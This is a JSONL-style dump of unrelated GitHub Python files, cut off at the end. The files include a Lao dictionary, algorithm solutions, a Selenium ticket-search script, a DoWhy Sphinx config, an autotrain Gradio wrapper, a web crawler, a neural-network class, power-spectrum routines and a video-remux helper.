{colors.get(w,\"ບໍ່ພົບຄຳວັບນີ້\")}')\nprint(\"Welcom to funny dictionary.\")\nch = input(\"ກົດ 1 ແປເປັນພາສາລາວ, press 2 for English to Lao : \")\nif ch == '1':\n word = input(\" ຄຳສັບທີ່ຕ້ອງການແປ: \")\n col2(word)\nelif ch == \"2\":\n word = input('Word to translate : ')\n col(word)\nelse:\n print('Error!! ')\n \n\n\n","repo_name":"LONGLAI007/PYTHON","sub_path":"dictionnaary2.py","file_name":"dictionnaary2.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73403463688","text":"# https://www.acmicpc.net/problem/11021\n\nimport sys\nsys.stdin = open(\"11021_input.txt\", \"r\")\n\ntest_case = int(input()) # 맨 첫줄에 테스트 케이스 개수(5)가 주어진다\n\nfor _ in range(test_case):\n a, b = map(int, input().split())\n print(f'Case #{_+1}: {a+b}')","repo_name":"code-sum/Algorithm","sub_path":"BOJ/220725/11021.py","file_name":"11021.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"38525626048","text":"import json\nimport requests\nimport random\nimport pprint\nimport os\nimport sys\n\nfrom bip32keys.bip32keys import Bip32Keys\n\n\ndef post_user():\n\n # Get public and private keys pair from file\n with open(\"generated.json\") as keys:\n keys_list = json.load(keys)\n users_keys = random.choice(keys_list)\n\n public_key = users_keys[\"public_key\"]\n private_key = users_keys[\"private_key\"]\n\n print(f\"Your private keys is: {public_key}\")\n print(f\"Your public key is: {private_key}\")\n \n # Create message and dump the one to the json\n message = {\n \"email\": \"test@test.com\", \n \"phone\": \"123756349\", \n \"timestamp\": \"1535646214275\"\n }\n\n print(\"\\nYour message is: \")\n print(message)\n print(\"\\n\")\n \n data = {\n \"signature\": Bip32Keys.sign_message(json.dumps(message), private_key),\n \"public_key\": public_key,\n \"message\":message\n }\n\n create_account_url = f\"http://pdms2.robin8.io/api/accounts/\"\n\n print(create_account_url)\n # Request to the server\n response = requests.post(create_account_url, data=json.dumps(data))\n\n print(response.json())\n\n\n\nif __name__ == '__main__':\n folder = os.path.dirname(os.path.abspath(__file__))\n sys.path.append(folder)\n post_user()\n\n","repo_name":"Robin8Put/pmes","sub_path":"test_signature/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"28785343182","text":"# -*-coding:utf-8-*-\n\"\"\"\n****************************************\nauthor:善待今天\ntime:2019/07/30 17:38\nfile:update_date.py\nsoftware:PyCharm Community Edition\nE-mail:2904504961@qq.com\nMotivational motto: Do difficult things and get something\n****************************************\n\"\"\"\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndriver = webdriver.Chrome()\ndriver.maximize_window()\n\ndriver.get('https://www.12306.cn/index/')\n\njs = \"\"\"\nvar a = document.getElementById(\"fromStationText\");\nvar b = document.getElementById(\"fromStation\");\nvar c = document.getElementById(\"toStationText\");\nvar d = document.getElementById(\"toStation\");\nvar e = document.getElementById(\"train_date\");\na.value = arguments[0];\nb.value = arguments[1];\nc.value = arguments[2];\nd.value = arguments[3];\ne.readonly = false;\ne.value = arguments[4];\n\"\"\"\ndriver.execute_script(js,'上海','SHH','杭州东','HGH','2019-08-07')\n\nloc_find = (By.XPATH,'//a[@id=\"search_one\"]')\nWebDriverWait(driver,20).until(EC.visibility_of_element_located(loc_find))\ndriver.find_element(*loc_find).click()","repo_name":"cxh214917/web_test","sub_path":"web_class_20190726/update_date.py","file_name":"update_date.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34416720989","text":"# -*- coding: utf-8 -*-\n#\n# Configuration file for the Sphinx documentation builder.\n#\n# This file does only contain a selection of the most common options. For a\n# full list see the documentation:\n# http://www.sphinx-doc.org/en/stable/config\n\n# -- Path setup --------------------------------------------------------------\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#\nimport os\n\n# -- Project information -----------------------------------------------------\n\nproject = \"DoWhy\"\ncopyright = \"2022, PyWhy contributors\"\nauthor = \"PyWhy community\"\nversion = os.environ.get(\"CURRENT_VERSION\")\n\n# Version Information (for version-switcher)\nnot_empty = lambda x: len(x) > 0\nto_tag_obj = lambda t: {\"name\": t, \"url\": f\"/dowhy/{t}/index.html\"}\nhas_doc = lambda t: os.path.exists(f\"../../dowhy-docs/{t}/index.html\")\n\ngit_tags = reversed(list(filter(not_empty, os.environ.get(\"TAGS\").split(\",\"))))\ndoc_tags = list(filter(has_doc, git_tags))\n\nhtml_context = {\n \"current_version\": {\"name\": os.environ.get(\"CURRENT_VERSION\")},\n \"versions\": {\n \"tags\": list(map(to_tag_obj, doc_tags)),\n \"branches\": [{\"name\": \"main\"}],\n },\n}\n\n# -- General configuration ---------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\n#\n# needs_sphinx = '1.0'\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.viewcode\",\n \"sphinx.ext.todo\",\n \"nbsphinx\",\n \"sphinx_rtd_theme\",\n \"sphinxcontrib.googleanalytics\",\n \"sphinx_copybutton\",\n \"sphinx_design\",\n]\n\n# sphinx-panels shouldn't add bootstrap css since the pydata-sphinx-theme\n# already loads it\npanels_add_bootstrap_css = False\n\ngoogleanalytics_id = \"G-B139P18WHM\"\ncopybutton_prompt_text = \">>> \"\n\nautodoc_mock_imports = [\"matplotlib\", \"causalml\", \"pymc3\", \"econml\"]\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = [\"_templates\"]\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffix as a list of string:\n#\n# source_suffix = ['.rst', '.md']\nsource_suffix = \".rst\"\n\n# The master toctree document.\nmaster_doc = \"index\"\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#\n# This is also used if you do content translation via gettext catalogs.\n# Usually you set \"language\" from the command line for these cases.\nlanguage = \"en\"\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path .\nexclude_patterns = [\n \"_build\",\n \"Thumbs.db\",\n \".DS_Store\",\n \".ipynb_checkpoints\",\n \"example_notebooks/dowhy_ranking_methods.ipynb\",\n \"example_notebooks/dowhy_twins_example.ipynb\",\n]\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = \"sphinx\"\n\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nhtml_theme = \"pydata_sphinx_theme\"\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\n#\nhtml_theme_options = {\"navbar_end\": [\"navbar-icon-links\", \"versions\"]}\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n# Custom sidebar templates, must be a dictionary that maps document names\n# to template names.\n#\n# The default sidebars (for documents that don't match any pattern) are\n# defined by theme itself. Builtin themes are using these templates by\n# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',\n# 'searchbox.html']``.\n#\n# html_sidebars = {}\n\n\n# -- Options for HTMLHelp output ---------------------------------------------\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = \"dowhydoc\"\n\nhtml_logo = \"_static/dowhy-logo-small.png\"\n\n# -- Options for LaTeX output ------------------------------------------------\n\nlatex_elements = {\n # The paper size ('letterpaper' or 'a4paper').\n #\n # 'papersize': 'letterpaper',\n # The font size ('10pt', '11pt' or '12pt').\n #\n # 'pointsize': '10pt',\n # Additional stuff for the LaTeX preamble.\n #\n # 'preamble': '',\n # Latex figure (float) alignment\n #\n # 'figure_align': 'htbp',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title,\n# author, documentclass [howto, manual, or own class]).\nlatex_documents = [\n (master_doc, \"dowhy.tex\", \"dowhy Documentation\", \"Author\", \"manual\"),\n]\n\n\n# -- Options for manual page output ------------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [(master_doc, \"dowhy\", \"dowhy Documentation\", [author], 1)]\n\n\n# -- Options for Texinfo output ----------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n (master_doc, \"dowhy\", \"dowhy Documentation\", author, \"dowhy\", \"One line description of project.\", \"Miscellaneous\"),\n]\n\n\n# -- Options for Epub output -------------------------------------------------\n\n# Bibliographic Dublin Core info.\nepub_title = project\nepub_author = author\nepub_publisher = author\nepub_copyright = copyright\n\n# The unique identifier of the text. This can be a ISBN number\n# or the project homepage.\n#\n# epub_identifier = ''\n\n# A unique identification for the text.\n#\n# epub_uid = ''\n\n# A list of files that should not be packed into the epub file.\nepub_exclude_files = [\"search.html\"]\n\n\n# -- Extension configuration -------------------------------------------------\n\n# -- Options for todo extension ----------------------------------------------\n\n# If true, `todo` and `todoList` produce output, else they produce nothing.\ntodo_include_todos = True\n\n# init docstrings should also be included in class\nautoclass_content = \"both\"\n\n# Only uncomment for faster testing/building docs without compiling notebooks\n# nbsphinx_execute = \"never\"\n","repo_name":"py-why/dowhy","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","stars":6335,"dataset":"github-code","pt":"16"} +{"seq_id":"5698794590","text":"class Solution:\n def numOfSubarrays(self, arr: List[int], k: int, threshold: int) -> int:\n prefixSum = [0]\n sumVal, count = 0, 0\n for num in arr:\n sumVal += num\n prefixSum.append(sumVal)\n \n for i in range(len(prefixSum)-k):\n if prefixSum[i+k]-prefixSum[i] >= threshold*k:\n count += 1\n return count","repo_name":"jayaprakash-a/coding-prepation","sub_path":"leetcode/Problems/1343--Number-of-Sub-arrays-of-Size-K-and-Average-Greater-than-or-Equal-to-Threshold-Medium.py","file_name":"1343--Number-of-Sub-arrays-of-Size-K-and-Average-Greater-than-or-Equal-to-Threshold-Medium.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22220632026","text":"import lotr\nimport groupme\n\ndef SendMessage():\n message = lotr.message_to_send\n print(message)\n inp = input(\"Do you want to send this one? Y/N\")\n if inp.upper() == 'Y':\n groupme.MessageGroup(groupme.group, message)\n \n \n\nif __name__ == '__main__':\n SendMessage()","repo_name":"plaughlin98/LOTR-GroupMe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2797029911","text":"#!/usr/bin/env python3\n\"\"\"Provides a class ``DeepNeuralNetwork'' for binary classification\"\"\"\n# pylint: disable=invalid-name\n\nimport numpy as np\n\n\nclass DeepNeuralNetwork:\n \"\"\"Represents a deep neural network for binary classification\"\"\"\n\n def __init__(self, nx, layers):\n \"\"\"\n Initializes a binary classification neuron\n Arguments:\n nx: the number of input features\n layers: a list representing the number of nodes in each layer\n \"\"\"\n if isinstance(nx, int) is False:\n raise TypeError(\"nx must be an integer\")\n if nx < 1:\n raise ValueError(\"nx must be a positive integer\")\n\n if isinstance(layers, list) is False or len(layers) < 1:\n raise TypeError(\"layers must be a list of positive integers\")\n\n self.__L = len(layers)\n self.__cache = {}\n self.__weights = {}\n d1 = nx\n for index, d0 in enumerate(layers, 1):\n if isinstance(d0, int) is False or d0 < 1:\n raise TypeError(\"layers must be a list of positive integers\")\n key = 'W{}'.format(index)\n self.__weights[key] = np.random.randn(d0, d1) * np.sqrt(2 / d1)\n key = 'b{}'.format(index)\n self.__weights[key] = np.zeros((d0, 1))\n d1 = d0\n\n @property\n def L(self):\n \"\"\"\n Get the number of layers\n Return:\n the number of layers\n \"\"\"\n return self.__L\n\n @property\n def cache(self):\n \"\"\"\n Get the intermediary values of the network\n Return:\n the cache dictionary\n \"\"\"\n return self.__cache\n\n @property\n def weights(self):\n \"\"\"\n Get the weights and biases of the network\n Return:\n the weights dictionary\n \"\"\"\n return self.__weights\n","repo_name":"patrickdeyoreo/holbertonschool-machine_learning","sub_path":"old/supervised_learning/0x00-binary_classification/17-deep_neural_network.py","file_name":"17-deep_neural_network.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39262887710","text":"# -*- coding: utf-8 -*-\n# 互联网药品信息服务\n\nimport pickle\nimport re\nfrom selenium import webdriver\nfrom gjypjd.utils import *\nimport json\nimport time\n\ndef main():\n option = None\n mysql_db = DataBase()\n # 配置文件中开启是否无头,生产阶段关闭\n if if_headless():\n option = webdriver.ChromeOptions()\n option.add_argument(argument='headless')\n option.add_argument('--no-sandbox')\n\n for i in range(1, 1041): # 遍历1040个一级目录网页\n try:\n browser = webdriver.Chrome(chrome_options=option)\n url_1 = 'http://app1.sfda.gov.cn/datasearchcnda/face3/search.jsp?tableId=28&State=1&bcId=152912030752488832300204864740&State=1&curstart='+str(i)+'&State=1&tableName=TABLE28&State=1&viewtitleName=COLUMN212&State=1&viewsubTitleName=COLUMN210&State=1&tableView=%25E4%25BA%2592%25E8%2581%2594%25E7%25BD%2591%25E8%258D%25AF%25E5%2593%2581%25E4%25BF%25A1%25E6%2581%25AF%25E6%259C%258D%25E5%258A%25A1&State=1&cid=0&State=1&ytableId=0&State=1&searchType=search&State=1'\n browser.get(url_1)\n s = browser.page_source.replace('amp;', '')\n m = re.findall(r'content.jsp\\?tableId=28&tableName=TABLE28&tableView=互联网药品信息服务&Id=\\d+', s, re.M)\n browser.close()\n\n for j in range(len(m)):\n url_2 = 'http://app1.sfda.gov.cn/datasearchcnda/face3/' + m[j]\n browser = webdriver.Chrome(chrome_options=option)\n browser.get(url_2)\n sql = \"insert into t_hlwypxxfw(c_bh, dt_insertTime, c_url, b_content, c_json,c_page) VALUES (REPLACE(UUID(),\\\"-\\\",\\\"\\\"), sysdate(), %s,%s,%s,%s)\"\n mysql_db.exetcute_sql(sql, [url_2, browser.page_source, parse2json(browser.page_source),\n str(i) + '_' + str(j + 1)])\n\n # pickle.loads(s) 可用该方法将乱码汉字转换\n browser.close()\n except Exception as e:\n print(e)\n time.sleep(5)\n\n\ndef parse2json(html):\n \"\"\"\n 证书编号zsbh\n 服务性质fwxz\n 机构名称jgmc\n 法定代表fddb\n 网站负责人wzfzr\n 变更历史记录bglsjl\n 网站域名wzym\n 发证机关fzjg\n 有效起始日期yxqsrq\n 有效截至日期yxjzrq\n 证书状态zszt\n 地址邮编dzyb\n :return:json\n \"\"\"\n # 初始化,避免取不到的情况下为空值\n result_json = dict()\n # 批准文号\n reg_dict = dict()\n reg_dict['zsbh'] = r\"证书编号</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['fwxz'] = r\"服务性质</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['jgmc'] = r\"机构名称</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['fddb'] = r\"法定代表</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['wzfzr'] = r\"网站负责人</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['bglsjl'] = r\"变更历史记录</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['wzym'] = r\"网站域名</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['fzjg'] = r\"发证机关</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['yxqsrq'] = r\"有效起始日期</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['yxjzrq'] = r\"有效截至日期</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['zszt'] = r\"证书状态</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['dzyb'] = r\"地址邮编</td>\\s*<td.*>(.*)</td></tr>\"\n\n\n for i, v in reg_dict.items():\n reg_search = re.search(v, html)\n if reg_search is not None:\n result_json[i] = reg_search.group(1)\n else:\n result_json[i] = ''\n return json.dumps(result_json, ensure_ascii=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JohnWSY/crawlproject-gjypjd","sub_path":"gjypjd/hlwypxxfw.py","file_name":"hlwypxxfw.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"} +{"seq_id":"36785362737","text":"import gradio as gr\nimport os\nimport pandas as pd\nimport subprocess\n\ndef autotrain_llm(model_name, learning_rate, num_epochs, batch_size, block_size, trainer, warmup_ratio, weight_decay, gradient_accumulation, use_fp16, use_peft, use_int4, lora_r, lora_alpha, lora_dropout, push_to_hub, hf_token, repo_id, csv_file):\n # Save the uploaded CSV file\n if csv_file is None:\n return \"No CSV file uploaded. Please upload a CSV file to continue.\"\n\n# Check the size of the uploaded file\n df = pd.read_csv(csv_file.name, encoding='utf-8')\n print(df.to_string())\n # Write the DataFrame to data.csv\n csv_path = \"/workspace/data/train.csv\"\n df.to_csv(csv_path, index=False, encoding='utf-8')\n \n \n \n\n # Construct the command for training\n command = f\"\"\"\n autotrain llm --train --model {model_name} --project-name jainllama1 --data-path \"/workspace/data/\" --text-column text --lr {learning_rate} --batch-size {batch_size} --epochs {num_epochs} --block-size {block_size} --warmup-ratio {warmup_ratio} --lora-r {lora_r} --lora-alpha {lora_alpha} --lora-dropout {lora_dropout} --weight-decay {weight_decay} --gradient-accumulation {gradient_accumulation} {\"--fp16\" if use_fp16 else \"\"} {\"--use-peft\" if use_peft else \"\"} {\"--use-int4\" if use_int4 else \"\"} {\"--push-to-hub --token \" + hf_token + \" --repo-id \" + repo_id if push_to_hub else \"\"}\n \"\"\"\n # Start the process\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)\n\n# Print each line of the standard output as it's produced\n for line in iter(process.stdout.readline, ''):\n print(line, end='')\n\n# Wait for the process to complete\n process.wait()\n\n# Check for errors\n if process.returncode != 0:\n print(f\"The command exited with an error code: {process.returncode}\")\n\n # Return the result\n if result.returncode == 0:\n return \"Training complete!\"\n else:\n return f\"An error occurred: {result.stderr.decode()}\"\n\n# Define the Gradio interface\niface = gr.Interface(\n fn=autotrain_llm,\n inputs=[\n \n gr.Textbox(value=\"abhishek/llama-2-7b-hf-small-shards\", label=\"Model Name\"),\n gr.Slider(min=1e-5, max=1, step=1e-5, value=2e-4, label=\"Learning Rate\"),\n gr.Slider(min=1, max=100, value=1, label=\"Number of Epochs\"),\n gr.Slider(min=1, max=32, step=1, value=1, label=\"Batch Size\"),\n gr.Slider(min=1, max=2048, value=8, label=\"Block Size\"),\n gr.Dropdown(choices=[\"default\", \"sft\"], label=\"Trainer\", value=\"sft\"),\n gr.Slider(min=0, max=1, step=0.01, value=0.1, label=\"Warmup Ratio\"),\n gr.Slider(min=0, max=1, step=0.01, value=0.01, label=\"Weight Decay\"),\n gr.Slider(min=1, max=32, value=4, label=\"Gradient Accumulation\"),\n gr.Checkbox(value=True, label=\"Use FP16\"),\n gr.Checkbox(value=True, label=\"Use PEFT\"),\n gr.Checkbox(value=True, label=\"Use INT4\"),\n gr.Slider(min=1, max=64, value=16, label=\"Lora R\"),\n gr.Slider(min=1, max=64, value=32, label=\"Lora Alpha\"),\n gr.Slider(min=0, max=1, step=0.01, value=0.05, label=\"Lora Dropout\"),\n gr.Checkbox(value=False, label=\"Push to Hub\"),\n gr.Textbox(value=\"hf_XXX\", label=\"HF Token\"),\n gr.Textbox(value=\"username/repo_name\", label=\"Repo ID\"),\n \n gr.inputs.File(label=\"Upload CSV\"),\n ],\n outputs=\"text\",\n\n)\n\niface.launch(share=True,server_port=8888,debug=True)\n","repo_name":"allthingssecurity/FtaaS","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2775711569","text":"import requests\nimport json\n\ndef getuser(api_key):\n url = 'https://ghost.toxinum.xyz/api/v1/getuser'\n headers = {'Content-Type': 'application/json'}\n payload = {\n 'apiKey': api_key\n }\n data = json.dumps(payload)\n\n response = requests.post(url, headers=headers, data=data)\n\n if response.status_code == 200:\n return response.text\n else:\n return response.text","repo_name":"illusionghost3/ghostpip","sub_path":"ghostpip/getuser.py","file_name":"getuser.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11965415904","text":"import numpy\ntry:\n import matplotlib.pyplot as pyplot\n pyplotOK = True\nexcept ImportError:\n pyplotOK = False\nfrom radialProfile import azimuthalAverageBins,radialAverageBins\n\ndef hanning2d(M, N):\n \"\"\"\nA 2D hanning window, as per IDL's hanning function. See numpy.hanning for the 1d description\n\"\"\"\n\n if N <= 1:\n return numpy.hanning(M)\n elif M <= 1:\n return numpy.hanning(N) # scalar unity; don't window if dims are too small\n else:\n return numpy.outer(numpy.hanning(M),numpy.hanning(N))\n\ndef power_spectrum(*args,**kwargs):\n \"\"\"\nThin wrapper of PSD2. Returns the 1D power spectrum in stead of the 2D Power Spectral Density\n\"\"\"\n kwargs['oned']=True\n return PSD2(*args,**kwargs)\n\ndef PSD2(image, image2=None, oned=False,\n fft_pad=False, real=False, imag=False,\n binsize=1.0, radbins=1, azbins=1, radial=False, hanning=False,\n wavnum_scale=False, twopi_scale=False, **kwargs):\n \"\"\"\nTwo-dimensional Power Spectral Density.\nNAN values are treated as zero.\n\nimage2 - can specify a second image if you want to see the cross-power-spectrum instead of the\npower spectrum.\noned - return radial profile of 2D PSD (i.e. mean power as a function of spatial frequency)\nfreq,zz = PSD2(image); plot(freq,zz) is a power spectrum\nfft_pad - Add zeros to the edge of the image before FFTing for a speed\nboost? (the edge padding will be removed afterwards)\nreal - Only compute the real part of the PSD (Default is absolute value)\nimag - Only compute the complex part of the PSD (Default is absolute value)\nhanning - Multiply the image to be PSD'd by a 2D Hanning window before performing the FTs.\nReduces edge effects. This idea courtesy Paul Ricchiazzia (May 1993), author of the\nIDL astrolib psd.pro\nwavnum_scale - multiply the FFT^2 by the wavenumber when computing the PSD?\ntwopi_scale - multiply the FFT^2 by 2pi?\nazbins - Number of azimuthal (angular) bins to include. Default is 1, or\nall 360 degrees. If azbins>1, the data will be split into [azbins]\nequally sized pie pieces. Azbins can also be a numpy array. See\nAG_image_tools.azimuthalAverageBins for details\nradial - An option to return the *azimuthal* power spectrum (i.e., the spectral power as a function\nof angle). Not commonly used.\nradbins - number of radial bins (you can compute the azimuthal power spectrum in different annuli)\n\"\"\"\n\n # prevent modification of input image (i.e., the next two lines of active code)\n image = image.copy()\n\n # remove NANs (but not inf's)\n image[image!=image] = 0\n\n if hanning:\n image = hanning2d(*image.shape) * image\n\n if image2 is None:\n image2 = image\n else:\n image2 = image2.copy()\n image2[image2!=image2] = 0\n if hanning:\n image2 = hanning2d(*image2.shape) * image2\n\n if real:\n psd2 = numpy.real( correlate2d(image,image2,return_fft=True,fft_pad=fft_pad) )\n elif imag:\n psd2 = numpy.imag( correlate2d(image,image2,return_fft=True,fft_pad=fft_pad) )\n else: # default is absolute value\n psd2 = numpy.abs( correlate2d(image,image2,return_fft=True,fft_pad=fft_pad) )\n # normalization is approximately (numpy.abs(image).sum()*numpy.abs(image2).sum())\n\n if wavnum_scale:\n wx = numpy.concatenate([ numpy.arange(image.shape[0]/2,dtype='float') , image.shape[0]/2 - numpy.arange(image.shape[0]/2,dtype='float') -1 ]) / (image.shape[0]/2.)\n wy = numpy.concatenate([ numpy.arange(image.shape[1]/2,dtype='float') , image.shape[1]/2 - numpy.arange(image.shape[1]/2,dtype='float') -1 ]) / (image.shape[1]/2.)\n wx/=wx.max()\n wy/=wy.max()\n wavnum = numpy.sqrt( numpy.outer(wx,numpy.ones(wx.shape))**2 + numpy.outer(numpy.ones(wy.shape),wx)**2 )\n psd2 *= wavnum\n\n if twopi_scale:\n psd2 *= numpy.pi * 2\n\n if radial:\n azbins,az,zz = radialAverageBins(psd2,radbins=radbins, interpnan=True, binsize=binsize, **kwargs)\n if len(zz) == 1:\n return az,zz[0]\n else:\n return az,zz\n\n if oned:\n return pspec(psd2, azbins=azbins, binsize=binsize, **kwargs)\n\n # else...\n return psd2\n\ndef pspec(psd2, return_index=True, wavenumber=False, return_stddev=False, azbins=1, binsize=1.0, view=False, **kwargs):\n \"\"\"\nCreate a Power Spectrum (radial profile of a PSD) from a Power Spectral Density image\n\nreturn_index - if true, the first return item will be the indexes\nwavenumber - if one dimensional and return_index set, will return a normalized wavenumber instead\nview - Plot the PSD (in logspace)?\n\"\"\"\n #freq = 1 + numpy.arange( numpy.floor( numpy.sqrt((image.shape[0]/2)**2+(image.shape[1]/2)**2) ) )\n\n azbins,(freq,zz) = azimuthalAverageBins(psd2,azbins=azbins,interpnan=True, binsize=binsize, **kwargs)\n if len(zz) == 1: zz=zz[0]\n # the \"Frequency\" is the spatial frequency f = 1/x for the standard numpy fft, which follows the convention\n # A_k = \\sum_{m=0}^{n-1} a_m \\exp\\left\\{-2\\pi i{mk \\over n}\\right\\}\n # or\n # F_f = Sum( a_m e^(-2 pi i f x_m) over the range m,m_max where a_m are the values of the pixels, x_m are the\n # indices of the pixels, and f is the spatial frequency\n freq = freq.astype('float') # there was a +1.0 here before, presumably to deal with div-by-0, but that shouldn't happen and shouldn't have been \"accounted for\" anyway\n\n if return_index:\n if wavenumber:\n fftwavenum = (numpy.fft.fftfreq(zz.size*2)[:zz.size])\n return_vals = list((fftwavenum,zz))\n #return_vals = list((len(freq)/freq,zz))\n else:\n return_vals = list((freq,zz))\n # return_vals = list((freq/len(freq),zz))\n else:\n return_vals = list(zz)\n if return_stddev:\n zzstd = azimuthalAverageBins(psd2,azbins=azbins,stddev=True,interpnan=True, binsize=binsize, **kwargs)\n return_vals.append(zzstd)\n\n if view and pyplotOK:\n pyplot.loglog(freq,zz)\n pyplot.xlabel(\"Spatial Frequency\")\n pyplot.ylabel(\"Spectral Power\")\n\n return return_vals\n\n####################################################################################\n\ndef correlate2d(im1,im2, boundary='wrap', **kwargs):\n \"\"\"\n Cross-correlation of two images of arbitrary size. Returns an image\n cropped to the largest of each dimension of the input images\n\n Options\n -------\n return_fft - if true, return fft(im1)*fft(im2[::-1,::-1]), which is the power\n spectral density\n fftshift - if true, return the shifted psd so that the DC component is in\n the center of the image\n pad - Default on. Zero-pad image to the nearest 2^n\n crop - Default on. Return an image of the size of the largest input image.\n If the images are asymmetric in opposite directions, will return the largest\n image in both directions.\n boundary: str, optional\n A flag indicating how to handle boundaries:\n * 'fill' : set values outside the array boundary to fill_value\n (default)\n * 'wrap' : periodic boundary\n\n WARNING: Normalization may be arbitrary if you use the PSD\n \"\"\"\n\n from astropy.convolve import convolve\n\n return convolve(np.conjugate(im1), im2[::-1, ::-1], normalize_kernel=False,\n boundary=boundary, ignore_edge_zeros=False, **kwargs)","repo_name":"hopehhchen/TurbuStat","sub_path":"turbustat/statistics/psds.py","file_name":"psds.py","file_ext":"py","file_size_in_byte":7238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"12198084858","text":"#!/usr/bin/env python\n\nimport subprocess\nimport sys\nimport os\nimport re\nimport json\nimport xmltodict\n\nimport remux\n\nvidFile = \"\"\n\nASPECT_RATIO = {\n \"1.33\" : \"4:3\",\n \"1.333\" : \"4:3\",\n \"1.77\" : \"16:9\",\n \"1.778\" : \"16:9\",\n}\n\n\nDVB_SIGNALING = {\n \"PAT\": 3008,\n \"PMT\": 3008,\n \"SDT\": 1500,\n \"NIT\": 1400,\n \"AIT\": 2000 #used by data carousel\n}\n\ndef getVideoID(vid_name):\n print(\"Getting Video ID...\\n\\n\")\n data = {}\n proc = subprocess.run(\"mediainfo --Output=XML \" + vid_name, shell=True, stdout=subprocess.PIPE);\n xml = proc.stdout\n my_dict_string = xmltodict.parse(xml)\n my_dict = json.dumps(my_dict_string, indent=4, sort_keys=True)\n my_dict = json.loads(my_dict)\n video_attrib = my_dict['MediaInfo']['media']['track']\n return video_attrib\n\ndef generateAVI(vid_ids): #AVI is well supported by ffmpeg\n general = vid_ids[0]\n vid = vid_ids[1]\n aud = vid_ids[2]\n print(\"Generating AVI...\\n\\n\")\n\n file_descriptors = {}\n file_descriptors[\"resolution\"] = '1280x720' #{}x{}'.format(vid['Sampled_Width'],vid['Sampled_Height'])\n file_descriptors[\"frameRate\"] = vid['FrameRate']\n file_descriptors[\"videoBitRate\"] = vid['BitRate']\n file_descriptors[\"aspectRatio\"] = ASPECT_RATIO[vid['DisplayAspectRatio']]\n file_descriptors[\"audioBitRate\"] = aud['BitRate']\n #file_descriptors['audioMaxBitRate'] = aud['BitRate_Maximum']\n file_descriptors[\"audioSamplingRate\"] = aud['SamplingRate']\n file_descriptors[\"MaxRate\"] = 5000000#int(general['OverallBitRate']) * 15 #max to millions place\n file_descriptors[\"file_name\"] = os.path.splitext( vidFile)[0] + \"_video\" + \".avi\" \n fps_initial = 